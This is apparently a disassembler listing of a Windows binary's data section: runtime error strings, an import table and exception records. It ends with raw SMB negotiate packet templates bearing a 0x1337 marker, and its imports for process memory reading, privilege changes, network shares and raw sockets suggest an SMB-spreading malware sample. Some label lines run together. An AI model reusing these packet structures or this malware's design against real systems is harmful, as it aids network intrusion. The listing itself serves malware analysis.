align 4
aDomainError db 'Domain error',0 ; DATA XREF: .text:00453948�o
align 4
aBrokenPipe db 'Broken pipe',0 ; DATA XREF: .text:00453944�o
aTooManyLinks db 'Too many links',0 ; DATA XREF: .text:00453940�o
align 4
aReadOnlyFileSy db 'Read-only file system',0 ; DATA XREF: .text:0045393C�o
align 4
aInvalidSeek db 'Invalid seek',0 ; DATA XREF: .text:00453938�o
align 4
aNoSpaceLeftOnD db 'No space left on device',0 ; DATA XREF: .text:00453934�o
aFileTooLarge db 'File too large',0 ; DATA XREF: .text:00453930�o
align 4
aInappropriateI db 'Inappropriate I/O control operation',0 ; DATA XREF: .text:00453928�o
aTooManyOpenFil db 'Too many open files',0 ; DATA XREF: .text:00453924�o
aTooManyOpenF_0 db 'Too many open files in system',0 ; DATA XREF: .text:00453920�o
align 4
aInvalidArgumen db 'Invalid argument',0 ; DATA XREF: .text:0045391C�o
align 10h
aIsADirectory db 'Is a directory',0 ; DATA XREF: .text:00453918�o
align 10h
aNotADirectory db 'Not a directory',0 ; DATA XREF: .text:00453914�o
aNoSuchDevice db 'No such device',0 ; DATA XREF: .text:00453910�o
align 10h
aImproperLink db 'Improper link',0 ; DATA XREF: .text:0045390C�o
align 10h
aFileExists db 'File exists',0 ; DATA XREF: .text:00453908�o
aResourceDevice db 'Resource device',0 ; DATA XREF: .text:00453904�o
aUnknownError db 'Unknown error',0 ; DATA XREF: .text:00453900�o
; .text:0045392C�o ...
align 4
aBadAddress db 'Bad address',0 ; DATA XREF: .text:004538FC�o
aPermissionDeni db 'Permission denied',0 ; DATA XREF: .text:004538F8�o
align 4
aNotEnoughSpace db 'Not enough space',0 ; DATA XREF: .text:004538F4�o
align 10h
aResourceTempor db 'Resource temporarily unavailable',0 ; DATA XREF: .text:004538F0�o
align 4
aNoChildProcess db 'No child processes',0 ; DATA XREF: .text:004538EC�o
align 4
aBadFileDescrip db 'Bad file descriptor',0 ; DATA XREF: .text:004538E8�o
aExecFormatErro db 'Exec format error',0 ; DATA XREF: .text:004538E4�o
align 10h
aArgListTooLong db 'Arg list too long',0 ; DATA XREF: .text:004538E0�o
align 4
aNoSuchDeviceOr db 'No such device or address',0 ; DATA XREF: .text:004538DC�o
align 10h
aInputOutputErr db 'Input/output error',0 ; DATA XREF: .text:004538D8�o
align 4
aInterruptedFun db 'Interrupted function call',0 ; DATA XREF: .text:004538D4�o
align 10h
aNoSuchProcess db 'No such process',0 ; DATA XREF: .text:004538D0�o
aNoSuchFileOrDi db 'No such file or directory',0 ; DATA XREF: .text:004538CC�o
align 4
aOperationNotPe db 'Operation not permitted',0 ; DATA XREF: .text:004538C8�o
aNoError db 'No error',0 ; DATA XREF: .text:off_4538C4�o
align 10h
aRuntimeError db 'runtime error ',0
align 10h
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 10h
aSingError db 'SING error',0Dh,0Ah,0
align 10h
aDomainError_0 db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_453A74�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_432FD0+119�o
align 10h
asc_437D50 db 0Ah ; DATA XREF: sub_432FD0+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_432FD0+D3�o
db 0Ah
db 'Program: ',0
align 10h
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_432FD0+7D�o
align 4
dword_437D88 dd 0FFFFFFFFh, 433506h, 43350AhaSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTz db 'TZ',0 ; DATA XREF: sub_4338E9+2A�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_434CA0+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_434CA0+35�o
aHMmSs db 'H:mm:ss',0
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0
aMDYy db 'M/d/yy',0
align 10h
aDecember db 'December',0
align 4
aNovember db 'November',0
align 4
aOctober db 'October',0
aSeptember db 'September',0
align 4
aAugust db 'August',0
align 4
aJuly db 'July',0
align 4
aJune db 'June',0
align 4
aApril db 'April',0
align 4
aMarch db 'March',0
align 4
aFebruary db 'February',0
align 10h
aJanuary db 'January',0
dd offset dword_636544
dd 766F4Eh, 74634Fh, 706553h, 677541h, 6C754Ah, 6E754Ah
dd 79614Dh, 727041h, 72614Dh, 626546h, 6E614Ah, 75746153h
dd 79616472h, 0
aFriday db 'Friday',0
align 4
aThursday db 'Thursday',0
align 4
aWednesday db 'Wednesday',0
align 4
aTuesday db 'Tuesday',0
aMonday db 'Monday',0
align 4
aSunday db 'Sunday',0
align 4
aSat db 'Sat',0
aFri db 'Fri',0
aThu db 'Thu',0
dd offset byte_646557
dd offset dword_657554
dd 6E6F4Dh, 6E7553h
dword_437F18 dd 4E512331h, 4E41hdword_437F20 dd 4E492331h, 46hdword_437F28 dd 4E492331h, 44hdword_437F30 dd 4E532331h, 4E41hdword_437F38 dd 0FFFFFFFFh, 435BCCh, 435BD0h, 0FFFFFFFFh, 435C3Bh, 435C3Fh
; DATA XREF: sub_435A15+5�o
dd 447364h, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_437F68 dd offset off_44737C ; DATA XREF: .text:00437F9C�o
; .text:00437FD0�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
off_437F80 dd offset off_450DE0 ; DATA XREF: .text:00437F98�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_437F80
dd offset off_437F68
dd offset dword_437F38+18h
dd 0
db 0 ; DATA XREF: .text:00437FC8�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3, 437F98h
dword_437FB8 dd 3 dup(0) dd offset off_450DE0
dd offset unk_437FA8
align 10h
dd offset off_437F68
dd offset dword_437F38+18h
dword_437FD8 dd 4 dup(0) dd 2, 437FD0h
dword_437FF0 dd 3 dup(0) dd offset off_44737C
dd offset dword_437FD8+8
align 8
off_438008 dd offset off_44739C ; DATA XREF: .text:00438020�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_438008
dd offset off_437F68
dd offset dword_437F38+18h
dword_43802C dd 3 dup(0) dd 3, 438020h
dword_438040 dd 3 dup(0) dd offset off_44739C
dd offset dword_43802C+4
align 8
off_438058 dd offset off_450E10 ; DATA XREF: .text:00438070�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_438058
dd 0
db 0 ; DATA XREF: .text:00438098�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 438070h
dword_438088 dd 3 dup(0) dd offset off_450E10
dd offset unk_438078
dd offset dword_437F38+18h
dword_4380A0 dd 4 dup(0) dd 1, 43809Ch
dword_4380B8 dd 3 dup(0) dd offset off_447364
dd offset dword_4380A0+8
align 10h
off_4380D0 dd offset off_450E80 ; DATA XREF: .text:004380E8�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_4380D0
dword_4380EC dd 3 dup(0) dd 1, 4380E8h
dword_438100 dd 3 dup(0) dd offset off_450E80
dd offset dword_4380EC+4
align 8
dd 0FFFFFFFFh, 436238h
dword_438120 dd 19930520h, 1, 438118h, 4 dup(0) dd 0FFFFFFFFh, 43624Ch
dword_438144 dd 19930520h, 1, 43813Ch, 4 dup(0) dd 0FFFFFFFFh, 436270h, 0
dd offset loc_436260
dd 1, 436268h
dword_438178 dd 19930520h, 3, 438160h, 4 dup(0) dd 0FFFFFFFFh, 436294h
dword_43819C dd 19930520h, 1, 438194h, 4 dup(0) dd 0FFFFFFFFh, 4362A8h, 0
dd offset loc_4362B0
dd 0
dd offset loc_4362B8
dd 0
dd offset loc_4362C0
dd 3, 4362C8h, 4, 4362D0h, 0
dd offset loc_4362D8
dd 6, 4362E0h, 0
dd offset loc_4362E8
dd 8, 4362F0h, 9, 4362F8h, 0
dd offset loc_436300
dd 0Bh, 436308h, 0Ch, 436310h, 0
dd offset loc_436318
dd 0Eh, 436320h, 0
dd offset loc_436328
dd 0
dd offset loc_436330
dd 11h, 436338h, 11h, 436340h
dword_438258 dd 19930520h, 14h, 4381B8h, 4 dup(0) dd 0FFFFFFFFh, 436354h, 0
dd offset loc_43635F
dd 1, 436367h, 2, 43636Fh, 3, 43637Ah, 4, 436385h, 5, 436390h
dd 6, 436398h, 7, 4363A3h, 8, 4363ABh, 8, 4363B6h, 8, 4363C1h
dd 7, 4363CCh, 0Ch, 4363D7h, 7, 4363D7h, 0Eh, 4363E2h
dd 0Fh, 4363EDh, 0Eh, 4363F8h, 11h, 436403h, 0Eh, 436403h
dd 13h, 43640Eh, 7, 436419h, 15h, 436424h, 7, 436424h
dd 17h, 43642Fh, 18h, 43643Ah, 17h, 436445h, 1Ah, 436450h
dd 17h, 436450h, 1Ch, 43645Bh, 7, 436466h, 1Eh, 436471h
dd 7, 436471h, 20h, 43647Ch, 21h, 436487h, 20h, 436492h
dd 23h, 43649Dh, 20h, 43649Dh, 25h, 4364A8h, 7, 4364B3h
dd 27h, 4364BEh, 7, 4364BEh, 29h, 4364C9h, 2Ah, 4364D4h
dd 29h, 4364DFh, 2Ch, 4364EAh, 29h, 4364EAh, 2Eh, 4364F5h
dword_4383F4 dd 19930520h, 30h, 438274h, 5 dup(0) dd offset off_447364
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch, 42B901h, 0
dd offset off_44737C
align 8
dd 0FFFFFFFFh, 0
dd 1Ch, 41B26Ch, 0
dd offset off_44739C
dd 0
dd 0FFFFFFFFh, 0
dword_43845C dd 1Ch, 41B33Ah, 3, 438448h, 43842Ch, 438410hdword_438474 dd 0 ; sub_41B301+12�o ...
dd offset sub_41B2C4
align 10h
dd offset dword_43845C+8
dd 0FFFFFFFFh, 43650Ch
dword_43848C dd 19930520h, 1, 438484h, 4 dup(0) dd 0FFFFFFFFh, 436520h
dword_4384B0 dd 19930520h, 1, 4384A8h, 4 dup(0)dword_4384CC dd 2, 43842Ch, 438410hdword_4384D8 dd 0 dd offset sub_41B213
dd 0
dd offset dword_4384CC
dd 0FFFFFFFFh, 436534h
dword_4384F0 dd 19930520h, 1, 4384E8h, 4 dup(0) dd 0FFFFFFFFh, 436548h
dword_438514 dd 19930520h, 1, 43850Ch, 4 dup(0) dd 0FFFFFFFFh, 43655Ch
dword_438538 dd 19930520h, 1, 438530h, 4 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 4 dup(0)
dd offset loc_41B78B
dd 2 dup(0)
dd 2 dup(1), 438564h
dword_438588 dd 19930520h, 2, 438554h, 1, 438574h, 2 dup(0)
; DATA XREF: .text:loc_436570�o
dd 0FFFFFFFFh, 43657Ch
dword_4385AC dd 19930520h, 1, 4385A4h, 4 dup(0) dd 0FFFFFFFFh, 436590h, 0
dd offset loc_436598
dd 1, 4365A0h, 2, 4365A8h
dword_4385E8 dd 19930520h, 4, 4385C8h, 6 dup(0) dd offset off_450DE0
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 4290E1h, 0
dword_438628 dd 3, 438608h, 43842Ch, 438410hdword_438638 dd 0 ; sub_4290A8+12�o
dd offset sub_42906B
dd 0
dd offset dword_438628
dword_438648 dd 19930520h, 1, 438668h, 5 dup(0) dd 0FFFFFFFFh, 4365BCh
dword_438670 dd 19930520h, 1, 438690h, 5 dup(0) dd 0FFFFFFFFh, 4365D0h
dword_438698 dd 19930520h, 1, 4386B8h, 5 dup(0) dd 0FFFFFFFFh, 4365E4h, 0
dd offset off_450E10
dd 0
dd 0FFFFFFFFh, 0
dd 10h, 429277h, 0
dword_4386E0 dd 1, 4386C0h dword_4386E8 dd 0 dd offset sub_4292A4
dd 0
dd offset dword_4386E0
dd 387F0h, 2 dup(0)
dd 39082h, 37030h, 38A24h, 2 dup(0)
dd 390E0h, 37264h, 387C0h, 2 dup(0)
dd 391BCh, 37000h, 38A18h, 2 dup(0)
dd 391F4h, 37258h, 38A44h, 2 dup(0)
dd 3920Eh, 37284h, 38A08h, 2 dup(0)
dd 39230h, 37248h, 38AB4h, 2 dup(0)
dd 39246h, 372F4h, 38A3Ch, 2 dup(0)
dd 39270h, 3727Ch, 38A10h, 2 dup(0)
dd 395FEh, 37250h, 5 dup(0)
dd 77DD6BF0h, 77DD761Bh, 77DDEBE7h, 77DFD4C9h, 77DD7753h
dd 77DFD11Bh, 77DFC534h, 77DF08D5h, 77E215D9h, 77DF087Fh
dd 77DD7883h, 0
dd 7C80ADA0h, 7C801D77h, 7C80ABDEh, 7C80992Fh, 7C80B905h
dd 7C809B47h, 7C80B974h, 7C80DDF5h, 7C812ADEh, 7C81CE03h
dd 7C8312E5h, 7C801A24h, 7C831EABh, 7C8286EEh, 7C812782h
dd 7C81153Ch, 7C80B6A1h, 7C80A0D4h, 7C810D87h, 7C802520h
dd 7C8308ADh, 7C80180Eh, 7C80BDB6h, 7C8217ACh, 7C834D41h
dd 7C8214E3h, 7C82C2D3h, 7C8216A4h, 7C813093h, 7C80BE01h
dd 7C835DCAh, 7C810B8Eh, 7C810A77h, 7C835E8Fh, 7C80945Ch
dd 7C82FA46h, 7C80A427h, 7C81CDDAh, 7C901005h, 7C8024A7h
dd 7C80E93Fh, 7C83039Bh, 7C81F992h, 7C83632Dh, 7C8361EEh
dd 7C814EEAh, 7C80D262h, 7C830D74h, 7C81AE17h, 7C85F90Fh
dd 7C80DDFEh, 7C81E0C7h, 7C8021CCh, 7C8309E1h, 7C8643B5h
dd 7C801E16h, 7C864230h, 7C864B0Fh, 7C863F58h, 7C863DE5h
dd 7C8098EBh, 7C80998Dh, 7C810111h, 7C831CB8h, 7C831C45h
dd 7C821363h, 7C80A7D4h, 7C80EDD7h, 7C834EB1h, 7C8137D9h
dd 7C85B219h, 7C812D9Fh, 7C809728h, 7C809EF1h, 7C809E79h
dd 7C9179FDh, 7C9010EDh, 7C91188Ah, 7C80B829h, 7C910331h
dd 7C80C058h, 7C80BAA1h, 7C80B4CFh, 7C810637h, 7C809BF8h
dd 7C80929Ch, 7C802367h, 7C802442h, 7C809A51h, 7C809AE4h
dd 7C833478h, 7C80A35Eh, 7C80D077h, 7C832044h, 7C80BCCFh
dd 7C809E01h, 7C812641h, 7C80A490h, 7C838A0Ch, 7C812F08h
dd 7C81CF5Bh, 7C814AE7h, 7C81DF77h, 7C8127A7h, 7C809915h
dd 7C812E76h, 7C81DC03h, 7C84467Dh, 7C9109EDh, 7C80CCA8h
dd 7C838DE8h, 7C862E2Ah, 7C810E51h, 7C812BB6h, 7C810EF8h
dd 7C812F39h, 7C80CC97h, 7C809740h, 7C910340h, 7C9105D4h
dd 7C91043Dh, 7C8350BFh, 7C80176Bh, 7C80977Ah, 7C809766h
dd 7C8328F7h, 7C809BC5h, 7C937A40h, 7C812A09h, 7C801EEEh
dd 7C812F1Dh, 7C8111DAh, 7C814AF2h, 0
dd 71B2517Fh, 0
dd 7712A63Fh, 0
dd 7CAB8CB2h, 7CA40EE0h, 0
dd 7E44F209h, 7E42E5C2h, 7E42F420h, 7E42F383h, 7E41A8ADh
dd 0
dd 76A08017h, 0
dd 71AC0BDEh, 71AB3EA1h, 71AB4519h, 71AB2C69h, 71AB3E00h
dd 71AB951Eh, 71AB88D3h, 71AB4FD4h, 71AB2B66h, 71AB4428h
dd 71AB2DC0h, 71AC1028h, 71AB664Dh, 71AB3B91h, 71AB2BF4h
dd 71AB2B66h, 71AB8769h, 71AB406Ah, 71AB428Ah, 71AB615Ah
dd 71AB9639h, 71AB94DCh, 71AB50C8h, 71AB2BC0h, 71AB46C9h
dd 71AB4544h, 71AB2BC0h, 0
dd 76D6B096h, 0
db 49h ; I
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0D5h ; Õ
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 6Bh ; k
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
aI db 'i',0
aCreatethread db 'CreateThread',0
align 2
dw 175h
aGetmodulefil_0 db 'GetModuleFileNameA',0
align 10h
dd 736C03B6h, 6D637274h, 416970h, 784500B0h, 68547469h
dd 64616572h, 1690000h, 4C746547h, 45747361h, 726F7272h
dd 21A0000h
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0
aZ db 'z',0
aDeletecritical db 'DeleteCriticalSection',0
dw 247h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
aP_1 db '',0
aEntercriticals db 'EnterCriticalSection',0
align 2
dw 198h
aGetprocaddress db 'GetProcAddress',0
align 4
dd 6F4C0248h, 694C6461h, 72617262h, 4179h, 724600EFh, 694C6565h
dd 72617262h, 2520079h, 61636F4Ch, 6572466Ch, 25E0065h
dd 5670614Dh, 4F776569h, 6C694666h, 2E0065h, 736F6C43h
dd 6E614865h, 656C64h, 6E550365h, 5670616Dh, 4F776569h
dd 6C694666h, 13A0065h
aGetcurrentproc db 'GetCurrentProcess',0
dw 1DFh
aGetversionexa db 'GetVersionExA',0
dw 352h
aTerminatethrea db 'TerminateThread',0
db 5Bh ; [
db 3, 54h, 72h
aAnsactnamedpip db 'ansactNamedPipe',0
aM_1 db 'M',0
aCreatefilea db 'CreateFileA',0
db '|',0
aDeletefilea db 'DeleteFileA',0
db '=',0
aCopyfilea db 'CopyFileA',0
db 0Eh
db 3, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 156h
aGetfileattribu db 'GetFileAttributesA',0
align 4
db 77h ; w
db 1, 47h, 65h
aTmodulehandlea db 'tModuleHandleA',0
align 4
db 89h ; ‰
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 397h
aWritefile db 'WriteFile',0
dw 385h
aWaitforsingleo db 'WaitForSingleObject',0
aI_0 db 'I',0
aCreateeventa db 'CreateEventA',0
align 10h
db 0ABh ; «
db 2, 52h, 65h
aAdfile db 'adFile',0
align 4
db 0BFh ; ¿
db 3, 6Ch, 73h
aTrlena db 'trlenA',0
align 4
aE db 'E',0
aCreatedirector db 'CreateDirectoryA',0
align 4
db 0B0h ; °
db 3, 6Ch, 73h
aTrcata db 'trcatA',0
align 4
db 4Bh ; K
db 1, 47h, 65h
aTdrivetypea db 'tDriveTypeA',0
db 6Eh ; n
db 1, 47h, 65h
aTlogicaldrives db 'tLogicalDriveStringsA',0
dw 10Ch
aGetcomputern_0 db 'GetComputerNameA',0
align 2
dw 22Fh
aIsdebuggerpr_0 db 'IsDebuggerPresent',0
dw 3B9h
aLstrcpya db 'lstrcpyA',0
align 2
retf
; ---------------------------------------------------------------------------
db 1
aGettemppatha db 'GetTempPathA',0
align 2
dw 310h
aSetfilepointer db 'SetFilePointer',0
align 4
dd 6547015Bh, 6C694674h, 7A695365h, 2640065h, 65766F4Dh
dd 656C6946h, 4E0041h
aCreatefilemapp db 'CreateFileMappingA',0
align 4
db 9Ah ; š
db 2, 51h, 75h
aEryperformance db 'eryPerformanceFrequency',0
db 99h ; ™
db 2, 51h, 75h
aEryperforman_0 db 'eryPerformanceCounter',0
aP_2 db '¯',0
aExitprocess db 'ExitProcess',0
db '`',0
aCreateprocessa db 'CreateProcessA',0
align 2
dw 2B8h
aReleasemutex db 'ReleaseMutex',0
align 2
aZ_0 db 'Z',0
aCreatemutexa db 'CreateMutexA',0
align 2
dw 146h
aGetdiskfrees_0 db 'GetDiskFreeSpaceExA',0
db 0FBh ; û
db 1, 47h, 6Ch
aObalmemorystat db 'obalMemoryStatusEx',0
align 4
db 0D6h ; Ö
db 1, 47h, 65h
aTtimeformata db 'tTimeFormatA',0
align 2
dw 13Fh
aGetdateformata db 'GetDateFormatA',0
align 10h
db 0B9h ; ¹
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 16Ch
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 4
db 0B3h ; ³
db 3, 6Ch, 73h
aTrcmpa db 'trcmpA',0
align 4
db 52h ; R
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 287h
aPeeknamedpipe db 'PeekNamedPipe',0
aM_2 db 'Œ',0
aDuplicatehandl db 'DuplicateHandle',0
a__1 db '_',0
aCreatepipe db 'CreatePipe',0
align 2
dw 2AEh
aReadprocessmem db 'ReadProcessMemory',0
dw 27Ch
aOpenprocess db 'OpenProcess',0
db 62h ; b
db 2, 4Dh, 6Fh
aDule32next db 'dule32Next',0
align 4
db 51h ; Q
db 3, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 10h
db 60h ; `
db 2, 4Dh, 6Fh
aDule32first db 'dule32First',0
db 'l',0
aCreatetoolhe_0 db 'CreateToolhelp32Snapshot',0
align 4
db 8Eh ; Ž
db 2, 50h, 72h
aOcess32next db 'ocess32Next',0
db 8Ch ; Œ
db 2, 50h, 72h
aOcess32first db 'ocess32First',0
align 2
dw 13Dh
aGetcurrentthre db 'GetCurrentThread',0
align 2
dw 24Eh
aLocalalloc db 'LocalAlloc',0
align 10h
db 0BCh ; ¼
db 3, 6Ch, 73h
aTrcpyna db 'trcpynA',0
db 14h
db 3, 53h, 65h
aTfiletime db 'tFileTime',0
dw 15Dh
aGetfiletime db 'GetFileTime',0
db 0E9h ; é
db 1, 47h, 65h
aTwindowsdirect db 'tWindowsDirectoryA',0
align 10h
dd 6547016Bh, 636F4C74h, 69546C61h, 656Dh, 694600C5h, 6C43646Eh
dd 65736Fh, 694600D3h, 654E646Eh, 69467478h, 41656Ch, 694600C9h
dd 6946646Eh, 46747372h, 41656C69h, 2BA0000h, 6F6D6552h
dd 69446576h, 74636572h, 4179726Fh, 454B0000h, 4C454E52h
dd 642E3233h, 6C6Ch, 68430026h, 6F4C7261h, 41726577h, 2D50000h
dd 72707377h, 66746E69h, 1970041h
aIscharalphanum db 'IsCharAlphaNumericA',0
db 3Ah ; :
db 2, 53h, 65h
aNdmessagea db 'ndMessageA',0
align 10h
db 0FCh ; ü
align 2
aGetclassname_0 db 'GetClassNameA',0
aUser32_dll_0 db 'USER32.dll',0
align 4
db 34h ; 4
db 2, 53h, 65h
aTsecurityinfo db 'tSecurityInfo',0
dw 21Fh
aSetentriesinac db 'SetEntriesInAclA',0
align 2
dw 10Eh
aGetsecurityinf db 'GetSecurityInfo',0
db 1Ch
align 2
aAdjusttokenp_0 db 'AdjustTokenPrivileges',0
db 4Dh ; M
db 1, 4Ch, 6Fh
aOkupprivilegev db 'okupPrivilegeValueA',0
dd 704F01AAh, 72506E65h, 7365636Fh, 6B6F5473h, 6E65h, 65470123h
dd 65735574h, 6D614E72h, 4165h, 655201F9h, 74655367h, 756C6156h
dd 41784565h, 1E20000h, 4F676552h, 4B6E6570h, 78457965h
dd 1C90041h, 43676552h, 65736F6Ch, 79654Bh, 655201ECh
dd 65755167h, 61567972h, 4565756Ch, 4178h, 41564441h, 32334950h
dd 6C6C642Eh, 1070000h, 6C656853h, 6578456Ch, 65747563h
dd 0C40041h
aShgetspecialfo db 'SHGetSpecialFolderPathA',0
aShell32_dll_0 db 'SHELL32.dll',0
aA db 'A',0
aWsasocketa_0 db 'WSASocketA',0
align 2
aWs2_32_dll_0 db 'WS2_32.dll',0
align 2
dw 6
aWnetaddconne_1 db 'WNetAddConnection2A',0
aMpr_dll_0 db 'MPR.dll',0
aC db 'C',0
aGetudptable_0 db 'GetUdpTable',0
aIphlpapi_dll_0 db 'iphlpapi.dll',0
align 4
db 1Dh
align 2
aGetuserprofile db 'GetUserProfileDirectoryA',0
align 10h
aUserenv_dll db 'USERENV.dll',0
db 6
db 2, 48h, 65h
aApalloc db 'apAlloc',0
db 0Ch
db 2, 48h, 65h
aApfree db 'apFree',0
align 4
db 0D8h ; Ø
db 1, 47h, 65h
aTtimezoneinfor db 'tTimeZoneInformation',0
align 2
dw 1BEh
aGetsystemtime db 'GetSystemTime',0
dw 21Eh
aInterlockeddec db 'InterlockedDecrement',0
align 2
dw 222h
aInterlockedinc db 'InterlockedIncrement',0
align 2
dw 2C7h
aResumethread db 'ResumeThread',0
align 2
dw 359h
aTlssetvalue db 'TlsSetValue',0
db 0CCh
db 2, 52h, 74h
aLunwind db 'lUnwind',0
db 9Dh ;
db 2, 52h, 61h
aIseexception db 'iseException',0
align 2
dw 1AFh
aGetstartupinfo db 'GetStartupInfoA',0
db 8
db 1, 47h, 65h
aTcommandlinea db 'tCommandLineA',0
dw 1DEh
aGetversion db 'GetVersion',0
align 4
db 50h ; P
db 1, 47h, 65h
aTenvironmentva db 'tEnvironmentVariableA',0
dw 20Ah
aHeapdestroy db 'HeapDestroy',0
dd 65480208h, 72437061h, 65746165h, 3780000h, 74726956h
dd 466C6175h, 656572h, 69560375h, 61757472h, 6C6C416Ch
dd 636Fh, 65480210h, 65527061h, 6F6C6C41h, 22C0063h, 61427349h
dd 69725764h, 74506574h, 2190072h
aInitializecr_0 db 'InitializeCriticalSection',0
dw 13Eh
aGetcurrentth_0 db 'GetCurrentThreadId',0
align 10h
dd 6C540356h, 6C6C4173h, 636Fh, 6553031Dh, 73614C74h, 72724574h
dd 726Fh, 6C540358h, 74654773h, 756C6156h, 3190065h, 48746553h
dd 6C646E61h, 756F4365h, 746Eh, 654701B1h, 64745374h, 646E6148h
dd 656Ch, 6547015Eh, 6C694674h, 70795465h, 3620065h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
dw 23Ah
aLcmapstringa db 'LCMapStringA',0
align 2
dw 23Bh
aLcmapstringw db 'LCMapStringW',0
align 2
dw 212h
aHeapsize db 'HeapSize',0
align 2
dw 33Dh
aSetunhandledex db 'SetUnhandledExceptionFilter',0
dd 6553032Ch, 64745374h, 646E6148h, 656Ch, 654700FCh, 49504374h
dd 6F666Eh, 654700F5h, 50434174h, 18B0000h, 4F746547h
dd 50434D45h, 0ED0000h
aFreeenvironmen db 'FreeEnvironmentStringsA',0
aU db 'î',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 14Dh
aGetenvironment db 'GetEnvironmentStrings',0
dw 14Fh
aGetenvironme_0 db 'GetEnvironmentStringsW',0
align 4
db 0B2h ; ²
db 1, 47h, 65h
aTstringtypea db 'tStringTypeA',0
align 2
dw 1B5h
aGetstringtypew db 'GetStringTypeW',0
align 4
db 'å',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 10h
db 29h ; )
db 2, 49h, 73h
aBadreadptr db 'BadReadPtr',0
align 10h
db 26h ; &
db 2, 49h, 73h
aBadcodeptr db 'BadCodePtr',0
align 10h
db 5
db 3, 53h, 65h
aTendoffile db 'tEndOfFile',0
align 10h
a4 db '4',0
aComparestringa db 'CompareStringA',0
align 2
a5_0 db '5',0
aComparestringw db 'CompareStringW',0
align 4
db 8
db 3, 53h, 65h
aTenvironment_0 db 'tEnvironmentVariableA',0
aOleaut32_dll db 'OLEAUT32.dll',0
align 4
dd 27Dh dup(0)
dword_43A000 dd 0 dd offset sub_405B69
dd offset sub_418CA0
dd offset loc_429153
dword_43A010 dd 0 dword_43A014 dd 0 dd offset sub_42B7AB
dd offset sub_42C048
dd offset sub_4329D0
dd offset sub_432016
dword_43A028 dd 0 dword_43A02C dd 0 dd offset sub_42C0F0
dword_43A034 dd 0 dword_43A038 dd 0 dd offset sub_432027
dword_43A040 dd 4 dup(0) byte_43A050 db 90h ; DATA XREF: sub_40126C+B2�o
db 42h, 90h, 42h
db 90h
dd offset loc_429040+2
align 4
dword_43A05C dd 10FF8h, 0 dword_43A064 dd 10FF8h dword_43A068 dd 7FFDF020h, 0 dword_43A070 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) dd 13370000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_43A0F8 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_43A128 dd 0 dd 800000D4h, 2 dup(0)
